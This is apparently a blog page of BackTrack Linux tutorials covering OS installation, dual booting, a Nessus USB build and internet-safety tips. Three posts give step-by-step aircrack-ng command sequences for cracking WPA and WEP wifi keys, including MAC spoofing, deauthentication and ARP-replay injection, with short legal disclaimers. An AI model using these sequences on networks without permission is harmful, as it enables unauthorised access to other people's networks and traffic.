Categories
Aircrack-ng Linux WEP wifi WPA

Aircrack-ng – WEP and WPA-PSK keys cracking program

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools. Aircrack-ng is a set of tools for auditing wireless networks – not for WiFi hacking.  Make sure you use this on your own network or one where you have permission to test.

Aircrack-ng is the next generation of aircrack with lots of new features:

Categories
BackTrack Linux Ubuntu VMWare WEP WPA

Shutdown Command for BackTrack 3 or 4

Since BackTrack is built on Linux you can shutdown BackTrack from the shell using poweroff or restart it with reboot.

BackTrack links

Categories
BackTrack BackTrack 4 Beta BT BT4 HD HDD Linux Ubuntu VMWare WEP Windows WPA

BackTrack 4 PreRelease Hard Disk Install

Since BackTrack 4 Pre-Release does not contain an installer you can follow these steps to install BT4 quickly and easily. The assumption is that you are installing BT4 on an empty disk (/dev/sda in this tutorial).

Boot to BT4 DVD (download BackTrack 4 ISO – make sure to get the BT 4 Beta and not the BT4 Pre Release). Enter commands in bold.

1. Start by creating 3 partitions on the disk, one each for boot, swap and root. Note, since your disk size is probably different than mine the number of cylinders will likely be different.

root@bt:~# fdisk /dev/sda

The number of cylinders for this disk is set to 19457.
There is nothing wrong with that, but this is larger than 1024,
and could in certain setups cause problems with:
1) software that runs at boot time (e.g., old versions of LILO)
2) booting and partitioning software from other OSs
(e.g., DOS FDISK, OS/2 FDISK)

Command (m for help): n
Command action
e extended
p primary partition (1-4)
p
Partition number (1-4): 1
First cylinder (1-19457, default 1): <enter>
Using default value 1
Last cylinder, +cylinders or +size{K,M,G} (1-19457, default 19457): +128M

Command (m for help): n
Command action
e extended
p primary partition (1-4)
p
Partition number (1-4): 2
First cylinder (18-19457, default 18): <enter>
Using default value 18
Last cylinder, +cylinders or +size{K,M,G} (18-19457, default 19457): +1024M

Command (m for help): n
Command action
e extended
p primary partition (1-4)
p
Partition number (1-4): 3
First cylinder (150-19457, default 150): <enter>
Using default value 150
Last cylinder, +cylinders or +size{K,M,G} (150-19457, default 19457): +16000M

Command (m for help): t
Partition number (1-4): 2
Hex code (type L to list codes): 82
Changed system type of partition 2 to 82 (Linux swap / Solaris)

Command (m for help): a
Partition number (1-4): 1

Command (m for help): w
The partition table has been altered!

Calling ioctl() to re-read partition table.
Syncing disks.
root@bt:~#

2. Format the file systems, mount them and copy over the directory structure. Chroot into new environment.

root@bt:~# mke2fs /dev/sda1
root@bt:~# mkswap /dev/sda2
root@bt:~# swapon /dev/sda2
root@bt:~# mkreiserfs /dev/sda3
root@bt:~# mkdir /mnt/bt
root@bt:~# mount /dev/sda3 /mnt/bt/
root@bt:~# mkdir /mnt/bt/boot
root@bt:~# mount /dev/sda1 /mnt/bt/boot
root@bt:~# cp –preserve -R /{bin,dev,home,pentest,root,usr,boot,etc,lib,opt,sbin,var} /mnt/bt/
root@bt:~# mkdir /mnt/bt/{mnt,tmp,proc,sys}
root@bt:~# chmod 1777 /mnt/bt/tmp/
root@bt:~# mount -t proc proc /mnt/bt/proc
root@bt:~# mount -o bind /dev /mnt/bt/dev/
root@bt:~# chroot /mnt/bt/ /bin/bash

3. Configure /etc/lilo.conf to reflect your setup.

lba32
boot=/dev/sda
root=/dev/sda3

# bitmap=/boot/sarge.bmp
# bmp-colors=1,,0,2,,0
# bmp-table=120p,173p,1,15,17
# bmp-timer=254p,432p,1,0,0
# install=bmp

# delay=20

prompt
timeout=50

# map=/boot/map

vga=0x317

image=/boot/vmlinuz
label=”BT4″
read-only
initrd=/boot/splash.initrd
append=quiet

4. Fix first line in /etc/fstab, and remove unnecessary mount lines. Add the swap partition to the fstab so it gets loaded at boot time. Your fstab should look similar to this:

/dev/sda3 / reiserfs defaults 0 0 # AutoUpdate
/dev/sda2 none swap sw 0 0
proc /proc proc defaults 0 0 # AutoUpdate
sysfs /sys sysfs defaults 0 0 # AutoUpdate
devpts /dev/pts devpts gid=5,mode=620 0 0 # AutoUpdate
tmpfs /dev/shm tmpfs defaults 0 0 # AutoUpdate

5. Execute lilo and reboot!

root@bt:/# lilo -v
LILO version 22.8, Copyright (C) 1992-1998 Werner Almesberger
Development beyond version 21 Copyright (C) 1999-2006 John Coffman
Released 19-Feb-2007, and compiled at 14:08:06 on May 15 2008
Ubuntu

Reading boot sector from /dev/sda
Using MENU secondary loader
Calling map_insert_data

Boot image: /boot/vmlinuz
Mapping RAM disk /boot/splash.initrd
Added BT4 *

Writing boot sector.
Backup copy of boot sector in /boot/boot.0800
root@bt:/# exit
exit
root@bt:~# reboot

BackTrack links

Categories
Aircrack-ng aireplay airmon airodump BackTrack BT crack Encryption hack howto Linux Passwords Ubuntu Video VMWare WEP wifi Windows wireless WPA

HowTo: Crack WPA with Backtrack 3

This is an easy to follow tutorial on how to crack a WPA encrypted password. This information should only be used for education purposes.

Steps:

  1. airmon-ng stop wlan0
  2. ifconfig wlan0 down
  3. macchanger –mac 00:11:22:33:44:55 wlan0
  4. airmon-ng start wlan0
  5. airodump-ng wlan0
  6. airodump-ng -c (channel) -w (file name) –bssid (bssid) wlan0
  7. aireplay-ng -0 5 -a (bssid)wlan0
  8. aircrack-ng (filename-01.cap)-w (dictionary location)
BackTrack links

Categories
Aircrack-ng aireplay airmon airodump BackTrack BT crack Encryption hack howto Linux Passwords Ubuntu Video VMWare WEP wifi Windows wireless WPA

HowTo: Crack WEP with BackTrack 3

This is a tutorial on how to crack a wep encrypted password. This information should only be used for education purposes.

Steps:

  1. airmon-ng stop wlan0
  2. ifconfig wlan0 down
  3. macchanger –mac 00:11:22:33:44:55 wlan0
  4. airmon-ng start wlan0
  5. airodump-ng wlan0
  6. airodump-ng -c (channel) -w (file name) –bssid (bssid) wlan0
  7. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
  8. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
  9. aircrack-ng -b (bssid) (filename-01.cap)
BackTrack links

Categories
BackTrack BT BT 4 Linux Passwords Security Ubuntu VMWare WEP Windows WPA

How To Install Backtrack4 Using Grub On Ubuntu

Backtrack is an operating system that is specially designed for networking security. Bactrack OS is based on Linux. As of this writing the latest version of Bactrack is Backtrack4 with many, many useful applications. Before installing BT4, make sure you have installed Ubuntu on your computer so we can use Ubuntu’s Grub for booting.

Follow these steps to install and configure dual booting Ubuntu / Backtrack4.

  1. Prepare your PC
    Ubuntu OS installed on sda2
    BT4 will install on sda3
  2. Run BT4 using LiveCD
    user : root
    password : toor
    #startx
  3. Installation process

    # mkfs.ext3 /dev/sda3

    # mkdir /mnt/BT4
    # mkdir /mnt/ubuntu
    # mount /dev/sda3 /mnt/BT4
    # mount /dev/sda2 /mnt/ubuntu
    # mkdir /mnt/BT4/boot

    # cp /boot/vmlinuz /mnt/BT4/boot
    # cp --preserve -R /{bin,dev,home,pentest,root,usr,etc,lib,opt,sbin,var} /mnt/BT4/
    # mkdir /mnt/BT4/{mnt,proc,sys,tmp}
    # mount --bind /dev/ /mnt/BT4/dev/
    # mount -t proc proc /mnt/BT4/proc/

  4. Edit Grub of Ubuntu
    # vi /mnt/ubuntu/boot/grub/menu.lst

    #you must insert this at bottom page:
    title Backtrack4
    rootnoverify (hd0,2)
    kernel /boot/vmlinuz vga=791 root=/dev/sda3 ro autoexec=xconf;kdm
    boot

  5. Exit and restart your PC. Select “Backtrack4” and login.
  6. Registering sda3 to fstab
    We must register /dev/sda2 and /dev/sda3 so either Ubuntu or BT4 can be booted.

    # mkdir /mnt/BT4
    # mkdir /mnt/ubuntu
    # vi /etc/fstab

    /dev/sda2 /mnt/ubuntu ext3
    /dev/sda3 /mnt/BT4 ext3

Categories
Aircrack-ng aireplay airmon airodump BackTrack iwconfig kismet Linux macchanger Security WEP wifi WPA

Cracking WEP Using Backtrack: Beginner’s Guide

This tutorial is intended for user’s with little or no experience with Linux or wifi. BackTrack, from remote-exploit is a tool which makes it very easy to access any network secured by WEP encryption. This tutorial aims to guide you through the process of using it effectively.

Required Tools

  • You will need a computer with a wireless adapter listed here
  • Download BackTrack (4 Pre Release is the most recent as of this writing) and burn the ISO to a CD

OVERVIEW

BackTrack is a bootable live cd with a myriad of wireless and tcp/ip networking tools. This tutorial will only cover the included kismet and aircrack-ng suite of tools.

Tools Overview

  • Kismet – a wireless network detector and packet sniffer
  • airmon – a tool that can help you set your wireless adapter into monitor mode (rfmon)
  • airodump – a tool for capturing packets from a wireless router (otherwise known as an AP)
  • aireplay – a tool for forging ARP requests
  • aircrack – a tool for decrypting WEP keys
  • iwconfig – a tool for configuring wireless adapters. You can use this to ensure that your wireless adapter is in “monitor” mode which is essential to sending fake ARP requests to the target router
  • macchanger – a tool that allows you to view and/or spoof (fake) your MAC address

Glossary of Terms

  • AP: Access Point: a wireless router
  • MAC Address: Media Access Control address, a unique id assigned to wireless adapters and routers. It comes in hexadecimal format (ie 00:11:ef:22:a3:6a)
  • BSSID: Access Point’s MAC address
  • ESSID: Access Point’s Broadcast name. (ie linksys, default, belkin etc) Some AP’s will not broadcast their name but Kismet may be able to detect it anyway
  • TERMINAL: Command line interface. You can open this by clicking the black box icon next to the start key in BackTrack.
  • WEP: short for Wired Equivalency Privacy, it is a security protocol for Wi-Fi networks.
  • WPA: short for WiFi Protected Access. a more secure protocal than WEP for wireless networks. NOTE: this tutorial does not cover cracking WPA encryption

Since BackTrack is a live CD running off your cdrom, there is nowhere that you can write files to unless you have a Linux partition on your hard drive or a USB storage device. BackTrack has some NTFS support so you will be able to browse to your Windows based hard drive should you have one, but it will mount the partition as “read-only”.  To find your hard drive or USB storage device, just browse to the /mnt folder in the file manager. Typically a hard drive will appear named something like hda1 or hda2 if you have more than one partition on the drive. Alternately hdb1 could show if you have more than one hard disk. Having somewhere to write files that you can access in case you need to reboot makes the whole process a little easier.

DISCLAIMER

Hacking into someone’s wireless network without permission is probably against the law. Make sure you are using this to test your own system(s) or one that you have explicit permission to “test.”

IMPLEMENTATION

STEP 1

Monitoring Wireless Traffic With Kismet

Place the BackTrack CD into your cd-rom drive and boot into BackTrack. You may need to change a setting in your bios to boot from cd rom. During boot up you should see a message like “Hit ctrl+esc to change bios settings”. Changing your first boot device to cdrom will do the trick. Once booted into Linux, login as root with username: root password: toor. These are the default username and password used by BackTrack. A command prompt will appear. Type startx to start KDE (a ‘Windows’ like workspace for Linux).

Once KDE is up and running start kismet by clicking on the start key and browsing to BackTrack->Wireless Tools -> Analyzers ->Kismet. Alternatively you can open a Terminal and type:

kismet

Kismet will start running and may prompt you for your wireless adapter. Choose the appropriate adapter, most likely ‘ath0′, and sit back as kismet starts detecting networks in range.

NOTE: We are using kismet for two reasons:

  1. To find the bssid, essid, and channel number of the AP you are accessing.
  2. Kismet automatically puts your wireless adapter into monitor mode (rfmon). It does this by creating a VAP (virtual access point) or in other words, instead of only having ath0 as my wireless card it creates a virtual wifi0 and puts ath0 into monitor mode automatically. To find out your device’s name just type:

iwconfig

Which will look something like this:

While kismet detects networks and various clients accessing those networks you might want to type ’s’ and then ‘Q’ (case sensitive). This sorts all of the AP’s in your area by their signal strength. The default ‘autofit’ mode that kismet starts up in doesn’t allow you much flexibility. By sorting AP’s by signal strength you can scroll through the list with the arrow keys and hit enter on any AP you want more information on. (side note: when selecting target AP keep in mind this tutorial only covers accessing host AP’s that use WEP encryption. In kismet the flags for encryption are Y/N/0. Y=WEP N=Open Network- no encryption 0= other: WPA most likely.) Further reading on Kismet is available here.

Select the AP (access point) you want to access. Copy and paste the broadcast name (essid), MAC address (bssid), and channel number of your target AP into a text editor. BackTrack is KDE based so you can use kwrite. Just open a terminal and type in ‘kwrite’ or select it from the start button. In BackTrack’s terminal to copy and paste you use shift+ctrl+c and shift+control+v respectively. Leave kismet running to leave your wireless adapter in monitor mode. You can also use airmon to do this manually. airmon-ng -h for help.

STEP 2

Collecting Data With Airodump

Open a new terminal and start airodump to collect ARP replies from the target AP. Airodump is fairly straight forward, but for help you can type “airodump-ng -h” at the command prompt for additional options.

airodump-ng ath0 -w /mnt/hda2/home/admin/ap_dump 6 1

Breaking down this command:

  • ath0 is my wireless card
  • -w tells airodump to write the file to
    /mnt/hda2/admin/ap_dump
  • 6 is the channel 6 of my target AP
  • 1 tells airodump to only collect IVS – the data packets with the WEP key

STEP 3

Associate your wireless card with the AP you are accessing.

aireplay-ng -1 0 -e belkin -a 00:11:22:33:44:55 -h 00:11:22:AA:BB:CC ath0

  • -1 at the beginning specifies the type of attack. In this case we want fake authentication with AP. You can view all options by typing aireplay-ng -h
  • 0 specifies the delay between attacks
  • -e is the essid tag. belkin is the essid or broadcast name of my target AP. Linksys or default are other common names
  • -a is the bssid tag (MAC address). 00:11:22:33:44:55 is the MAC address of the target AP
  • -h is your wireless adapters MAC addy. You can use macchanger to view and change your mac address. macchanger -s ath0
  • ath0 at the end is my wireless adapters device name in Linux

STEP 4

Start packet injection with aireplay

aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:11:22:AA:BB:CC ath0

NOTES:

  • -b requires the MAC address of the AP we are accessing.
  • -h is your wireless adapters MAC addy. You can use macchanger to view and change your mac address. macchanger -s ath0
  • if packets are being collected at a slow pace you can type iwconfig ath0 rate auto to adjust your wireless adapter’s transmission rate. You can find your AP’s transmission rate in kismet by using the arrow keys up or down to select the AP and hitting enter. A dialog box will pop up with additional information. Common rates are 11M or 54M.

As aireplay runs, ARP packets count will slowly increase. This may take a while if there aren’t many ARP requests from other computers on the network. As it runs however, the ARP count should start to increase more quickly. If ARP count stops increasing, just open up a new terminal and re-associate with the ap via step 3. There is no need to close the open aireplay terminal window before doing this. Just do it simultaneously. You will probably need somewhere between 200-500k IV data packets for aircrack to break the WEP key.

If you get a message like this:

Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Just reassociate with the AP following the instructions on step 3.

STEP 5

Decrypting the WEP Key with Aircrack

Find the location of the captured IVS file you specified in step 2. Then type in a terminal:

aircrack-ng -s /mnt/hda2/home/ap_dump.ivs

Change /mnt/hda2/home/ap_dump.ivs to your file’s location.  Once you have enough captured data packets decrypting the key will only take a couple of seconds. If aircrack doesn’t find a key almost immediately, just sit back and wait for more data packets.

For more information or assistance you can access the BackTrack forums at remote-exploit.org.

Categories
Anti-Spyware Encryption Firewall Internet Linux Passwords Security Spyware SSL Virus Scan WEP wifi Windows Windows Update WPA

Internet Safety: How to keep your computer safe on the Internet

Here are some things you can, and should, do to stay safe.

  • Stay Up-To-Date – Most virus infections don’t have to happen. Software vulnerabilities that the viruses exploit usually already have patches available by the time the virus reaches a computer. The problem? The user simply failed to install the latest patches and updates that would have prevented the infection in the first place. The solution is simple: enable automatic updates, and visit Windows Update periodically. Keeping Windows and other software up-to-date is the most important (and easiest) thing you can do to protect your computer.
  • Get Educated – To be blunt, all the protection in the world won’t save you from yourself. Don’t open attachments that you aren’t positive are okay. Don’t fall for phishing scams. Don’t click on links in email that you aren’t positive are safe. Don’t install “free” software without checking it out first – many “free” packages are free because they come loaded with spyware, adware and worse. When visiting a web site, did you get a pop-up asking if it’s ok to install some software you’re not sure of because you’ve never heard of it? Don’t say “OK”. Not sure about some security warning you’ve been given? Don’t ignore it. Choose strong passwords, and don’t share them with others.
  • Use a Firewall – A firewall is a piece of software or hardware that sits between your computer and the Internet and only allows certain types of traffic to crossl. For example, a firewall may allow checking email and browsing the web, but disallow things that are commonly not as useful such as RPC or “Remote Procedure Calls”.
  • Virus Scan – Sometimes, typically via email, virii are able to cross the firewall and get to your computer anyway. A virus scanner will locate and remove them from your hard disk. A real time virus scanner will notice them as they arrive, even before they hit the disk, but at the cost of slowing down your machine a little. Important: because new virii are arriving every day, it’s important to keep your virus definitions up-to-date. Be sure to enable the scanning software’s automatic-update feature and have it do so every day.
  • Kill Spyware – Spyware is similar to virii in that they arrive unexpected and unannounced and proceed to do something undesired. Normally spyware is relatively benign from a safety perspective, but it can violate your privacy by tracking the web sites you visit, or add “features” to your system that you didn’t ask for. The worst offenders are spyware that hijack normal functions for themselves. For example, some like to redirect your web searches to other sites to try and sell you something. Of course some spyware is so poorly written that it might as well be a virus, given how unstable it can make your system. The good news is that, like virus scanners, there are spyware scanners that will locate and remove the offending software. 
  • Secure Your Mobile Connection – if you’re traveling and using internet hot spots, free Wifi or internet cafes, you must take extra precautions. Make sure that your web email access is via secure (https) connections, or that your regular mail is over an encrypted connection as well. Don’t let people “shoulder surf” and steal your password by watching you type it in a public place. Make sure your home Wifi has WEP or, preferably WPA security enabled if anyone can drive or walk within range.
  • Don’t forget the physical – an old computer adage is that “if it’s not physically secure, it’s not secure.” All of the precautions I’ve listed above are pointless if other people can get at your computer. They may not follow the safety rules I’ve laid out. A thief can easily get at all the unencrypted data on your computer if they can physically get to it. The common scenario is a laptop being stolen, but there are many reports of people who’ve been burned because a family member or roommate accessed their computer without their knowledge. 

It all might seem overwhelming, but it’s not nearly as overwhelming as an actual security problem if and when it happens to you. While we might want it to be otherwise, the practical reality of the internet, and computing today, is that we each must take responsibility for our own security online.

Categories
BackTrack BT Linux Ubuntu UNetbootin VMWare WEP Windows WPA

How to install BT4 dualboot xp on your HDD without vmware or dvd disks

This tutorial is about 1 SATA drive with 2 partitions, the first one has Windows XP

  1. Download BT4 ISO
  2. Download UNetbootin

Launch UNetbootin and choose the ISO path and pick your XP hdd C:

It wont delete your files , it will just add a few BT4 installation files, basically it makes it possible to boot your PC into a live CD without using a disc, and you can safley uninstall it when you enter Windows again

After you install BT4 with UNetbootin you can boot into BT4 easily, youĺl be given the choice of XP or BT4.

While in BackTrack click the file on desktop that says install and follow the prompts.  I formated the second partition with ext2 and 10gb swap.

Once complete reboot, but you won’t be able to boot into BT yet (the one you installed on second partition not the UNetbootin one on XP partition), so boot into the UNetbootin live cd BT and open a terminal and type the following to fix the grub. Note: you can even use a live cd linux for ubuntu if you have one works the same.

sudo grub

find /boot/grub/stage1

— you will get info about where BT is installed something like (hd?,?) mine was (hd1,1)

then type

root (hd1,1)

Reboot and enjoy.

BackTrack links

Categories
BackTrack BT Encryption Grep Linux Nessus Passwords SSL Ubuntu VMWare WEP Windows WPA

Backtrack 4 – USB/Nessus Boot with Persistent Changes

This how-to will show you a method for building a USB thumb drive with the following features:
  • Persistent Changes – Files saved and changes made will be kept across reboots.
  • Nessus and NessusClient installed – Everybody needs Nessus
  • Encryption configured (Note: This is not whole drive encryption)

Tools and Supplies

  1. A USB thumbdrive – minimum capacity 4GB
  2. A Backtrack 3 CDROM, Backtrack 4 DVD or an additional USB thumbdrive  (minimum 2GB) – Used to partition the thumbdrive.
  3. Optional: UNetbootin – A tool to transfer an iso image to a USB drive.
Download the Backtrack 4 Pre Release ISO here.
This tutorial is based on booting Backtrack 4 first. This means that you need some form of bootable Backtrack 4 media. This can be a virtual machine, DVD, or USB drive. Use your favorite method of creating a DVD or USB drive or you can use UNetBootin to create the thumb drive.  Below is a screenshot of using UnetBootin to install Backtrack 4 on a USB drive.
Installing Backtrack 4 with UnetBootin
It is as simple as selecting the image we want to write to the USB drive, the drive to write it to, and then clicking the ‘OK’ button. Warning: Make sure you pick the correct destination drive.
Partition the USB thumbdrive
The first step is to boot up Backtrack 4.  With the release of Backtrack 4 Final, a 4 GB drive is required if we are going to enable persistence.  For Backtrack 3 and Backtrack 4 Beta, we could get away with a 2GB drive.  We will also need to figure out which drive is our target drive. The following command will show the drives available and you can determine from that which is the new USB drive:
dmesg | egrep hd.|sd.
We need to partition and format the drive as follows:
  1. The first partition needs to be a primary partition of at least 1.5 GB and set to type vfat. Also remember to make this partition active when you are creating it. Otherwise you might have some boot problems.
  2. The second Partition can be the rest of the thumb drive.
Below are the steps to take to get the drive partitioned and formatted. These steps are taken from this video on Offensive Security website. A ‘# blah blah‘ indicates a comment and is not part of the command and user typed commands are bolded. One note, we will need to delete any existing partitions on the drive.

fdisk /dev/sda # use the appropriate drive letter for your system
# delete existing partitions. There may be more than one.
Command (m for help): d
Partition number (1-4): 1
# create the first partition
Command (m for help): n
Command action
e   extended
p   primary partition (1-4)
p
Partition number (1-4): 1
First cylinder (1-522, default 1):
Using default value 1
Last cylinder, +cylinders or +size{K,M,G} (1-522, default 522): +1500M
#create the second partition
Command (m for help): n
Command action
e   extended
p   primary partition (1-4)
p
Partition number (1-4): 2
First cylinder (193-522, default 193):
Using default value 193
Last cylinder, +cylinders or +size{K,M,G} (193-522, default 522):
Using default value 522
# Setting the partition type for the first partition to vfat/fat32
Command (m for help): t
Partition number (1-4): 1
Hex code (type L to list codes): b
Changed system type of partition 1 to b (W95 FAT32)
# Setting the partition type for the second partition to Linux
Command (m for help): t
Partition number (1-4): 2
Hex code (type L to list codes): 83
# Setting the first partition active
Command (m for help): a
Partition number (1-4): 1
Command (m for help): w
# now it is time to format the partitions
mkfs.vfat /dev/sdb1
mkfs.ext3 -b 4096 -L casper-rw /dev/sdb2

Two things to notice above in the format commands; 1) we are using ext3 instead of ext2 and 2) you must include the -L casper-rw portion of the command. Being able to use ext3 is great because of journaling. The -L casper-rw option helps us get around the problem we had where we had to enter the partition name in order to get persistence working. As you will see, that is no longer necessary.  So go ahead and partition and format the drive according the layout above.
Make it a bootable Backtrack 4 USB thumb drive
  1. Mount the first partition.
  2. Copy the Backtrack files to it.
  3. Install grub.

Following are the commands to execute. Again, ‘#’ denote comments and user typed commands are in bold.

# mount the first partition, sda1 in my case.
mkdir /mnt/sda1
mount /dev/sda1 /mnt/sda1

# copy the files, you will need to find where the ISO is mounted on your system.
cd /mnt/sda1
rsync -r /media/cdrom0/* .

# install grub
grub-install –no-floppy –root-directory=/mnt/sda1 /dev/sda

That’s it. We now have a bootable Backtrack 4 USB thumb drive.
Persistent Changes
This is done much differently and more easily than it was in Backtrack 4 Beta or Backtrack 3. First of all, for basic persistence, we don’t have to do anything at all. There is already a menu option that takes care of it for us. Unfortunately, it is only for console mode so we need to make a couple changes.  We want to do the following things:
  1. Change the default boot selection to persistent.
  2. Set the resolution for our gui.

To do so, do the following. Again, ‘#’ …comment….user typed…blah blah.

cd /mnt/sda1/boot/grub
vi menu.lst

# change the default line below to ‘default 4′ and append ‘vga=0×317′ (that’s a zero) to the kernel line to set the resolution to 1024×768
# By default, boot the first entry.
default 4
.
.
.
title                Start Persistent Live CD
kernel           /boot/vmlinuz BOOT=casper boot=casper persistent rw quiet vga=0×317
initrd            /boot/initrd.gz

:wq

Here is my entire menu.lst file for reference.

# By default, boot the first entry.
default 4
# Boot automatically after 30 secs.
timeout 30

splashimage=/boot/grub/bt4.xpm.gz
title                Start BackTrack FrameBuffer (1024×768)
kernel                /boot/vmlinuz BOOT=casper boot=casper nopersistent rw quiet vga=0×317
initrd                /boot/initrd.gz
title                Start BackTrack FrameBuffer (800×600)
kernel                /boot/vmlinuz BOOT=casper boot=casper nopersistent rw quiet vga=0×314
initrd                /boot/initrd800.gz
title                Start BackTrack Forensics (no swap)
kernel                /boot/vmlinuz BOOT=casper boot=casper nopersistent rw vga=0×317
initrd                /boot/initrdfr.gz
title                Start BackTrack in Safe Graphical Mode
kernel                /boot/vmlinuz BOOT=casper boot=casper xforcevesa rw quiet
initrd                /boot/initrd.gz

title                Start Persistent Live CD
kernel                /boot/vmlinuz BOOT=casper boot=casper persistent rw quiet vga=0×317

initrd                /boot/initrd.gz
title                Start BackTrack in Text Mode
kernel                /boot/vmlinuz BOOT=casper boot=casper nopersistent textonly rw quiet
initrd                /boot/initrd.gz
title                Start BackTrack Graphical Mode from RAM
kernel                /boot/vmlinuz BOOT=casper boot=casper toram nopersistent rw quiet
initrd                /boot/initrd.gz
title                Memory Test
kernel                /boot/memtest86+.bin
title                Boot the First Hard Disk
root                (hd0)
chainloader +1

Reboot and either select “Start Persistent Live CD” or just wait since we set it to auto-boot to persistent mode. To test it, create a file and reboot again. If your file is still there, everything is golden.
Install Nessus
Download the Ubuntu Nessus and NessusClient packages from nessus.org. The 32-bit 8.10 version worked fine for me.  Again, with Backtrack 4 things are little easier. To install the Nessus server, simply execute the following command to install the package.

dpkg install Nessus-4.0.2-ubuntu810_i386.deb

Things used to be a little bit more complicated for the client, but with the release of the pre-final version, it is just as easy as installing as the server.

dpkg install NessusClient-4.0.2-ubuntu810_i386.deb

Finally it’s time to configure Nessus. Execute each of the following and follow the prompts. My entries are below for fun.

#create server certificate
/opt/nessus/sbin/nessus-mkcert
This script will now ask you the relevant information to create the SSL
certificate of Nessus. Note that this information will *NOT* be sent to
anybody (everything stays local), but anyone with the ability to connect to your
Nessus daemon will be able to retrieve this information.
CA certificate life time in days [1460]:
Server certificate life time in days [365]:
Your country (two letter code) [FR]:US
Your state or province name [none]:Confused
Your location (e.g. town) [Paris]:Somewhere In Time
Your organization [Nessus Users United]:
.
.
.
Congratulations. Your server certificate was properly created.
.
.
# add user
/opt/nessus/sbin/nessus-adduser
Login :Me
Authentication (pass/cert) : [pass]
Login password :
Login password (again) :
Do you want this user to be a Nessus ‘admin’ user ? (can upload plugins, etc…) (y/n) [n]:y
User rules
———-
nessusd has a rules system which allows you to restrict the hosts
that Me has the right to test. For instance, you may want
him to be able to scan his own host only.
Please see the nessus-adduser manual for the rules syntax
Enter the rules for this user, and enter a BLANK LINE once you are done :
(the user can have an empty rules set)
Login             : Me
Password         : ***********
This user will have ‘admin’ privileges within the Nessus server
Rules             :
Is that ok ? (y/n) [y]y
User added

We want to disable Nessus starting at boot. We are going to do some things a little later than require that Nessus not be running at boot.
/usr/sbin/update-rc.d -f nessusd remove

This command does not remove the Nessus start scripts. It only removes the links that cause Nessus to start at boot time.

The next thing we need to do is register our installation so we can get the plugin feed. You need to go here and request a key. That is a link to the free feed for home use. Use appropriately.
Once you have your key. Execute the following to update your plugins. Please note that there are two dashes before register in the nessus-fetch line below. They can display as one sometimes.

/opt/nessus/bin/nessus-fetch register [your feed code here]

When that is done, and it is going to take a few minutes, you are ready to start the server and client. Be aware that with version 4.0, while the command to start returns quickly, the actual starting of the service may take a minute or two. In many cases, I have actually had to reboot before Nessus started working. You can use netstat -na to check that the server is listening on port 1241.

/etc/init.d/nessusd start
/opt/nessus/bin/NessusClient

Configure Encryption
Since we are using this tool to poke at peoples networks and systems, with permission of course, it is very important that the information we find be protected. To do this, we are going to setup an encrypted volume that will eventually become our home directory.
This can be done with the gui or via command line. We will be using the gui because we need to be able to format the volume with ext3 and, as yet, I have not been able to figure out how to do that via the command line on linux.
Truecrypt Configuration (Time 0_00_12;24)
Truecrypt Configuration (Time 0_00_16;18)
Truecrypt Configuration (Time 0_00_28;12)
Truecrypt Configuration (Time 0_00_28;12)
Truecrypt Configuration (Time 0_00_29;00)
Truecrypt_size
Truecrypt Configuration (Time 0_00_41;18)
Truecrypt Configuration (Time 0_00_44;24)
Truecrypt_type
Truecrypt Configuration (Time 0_00_50;18)
You will get a message that the volume was successful created. Click on the ‘OK’ button, then exit the Truecrypt gui, both the ‘Create Volume’ windows and the main windows. We want to be back at the command prompt at this point.
If you want to test the your filesystem, execute the following, note the -k ” is two single quotes, not a double quote:

truecrypt -t -k ” protect-hidden=no /my_secret_stuff /media/truecrypt1
mount
cd /media/truecrypt1
df .

This will show that the volume is mounted and the amount of disk space you have left. Our next step is to have this volume mounted when we log in. We do this by editing the root user’s .profile file. Add the truecrypt command above to root’s .profile so it looks like this:

# ~/.profile: executed by Bourne-compatible login shells.
if [ "$BASH" ]; then
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi
fi

truecrypt -t -k '' --protect-hidden=no /my_secret_stuff /media/truecrypt1

mesg n

The next time you reboot you will be asked for the password for the volume and it will be mounted for you.

Now it is time to tweak a few tings

Tweak a few things
The first thing we are going to do is go ahead and configure networking to start at boot time. It’s convenient and easy to disable if we need to. All we have to do is execute the following command.

/usr/sbin/update-rc.d networking defaults

Next thing we want to do is make sure all our tools and the system itself is up-to-date. First execute the following:

apt-get update

This is update the software repository information. Next, execute the this command:

apt-get upgrade

The system will determine if there is anything that needs to be updated and then prompt you to continue. Individual packages can be updated by including the package name after upgrade.
This next bit is interesting and I was surprised it worked. We are going to reset the root user’s home directory during the login process to the mounted truecrypt volume. This will ensure that anything written to the home directory will be encrypted.  The following commands will set this up for us:

cd /media/truecrypt1
rsync -r –links /root/ .
# add the bold lines below
vi /root/.profile

# ~/.profile: executed by Bourne-compatible login shells.
if [ "$BASH" ]; then
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi
fi

truecrypt -t -k '' --protect-hidden=no /my_secret_stuff /media/truecrypt1

export HOME=/media/truecrypt1
export HISTFILE=/media/truecrypt1/.bash_history


cd

mesg n

:wq

The next time you reboot, when you are finally in the system, your home directory will be /media/truecrypt1.
There is one last thing we want to do. We want to change nessus to log to the encrypted volume. This is very easy. The file that controls this is /opt/nessus/etc/nessus/nessusd.conf. We need to create a place for the log files to go. So execute the following

cd /media/truecrypt1
mkdir -p nessus/logs

Once you have done that, edit the /opt/nessus/etc/nessus/nessusd.conf file and change this:

.
.
.
# Log file :
logfile = /opt/nessus/var/nessus/logs/nessusd.messages
# Shall we log every details of the attack ? (disk intensive)
log_whole_attack = no
# Dump file for debugging output
dumpfile = /opt/nessus/var/nessus/logs/nessusd.dump
.
.
.

to this:

.
.
.
# Log file :
logfile = /media/truecrypt1/nessus/logs/nessusd.messages
# Shall we log every details of the attack ? (disk intensive)
log_whole_attack = no
# Dump file for debugging output
dumpfile = /media/truecrypt1/nessus/logs/nessusd.dump
.
.
.

That’s it. You are all done now.

BackTrack links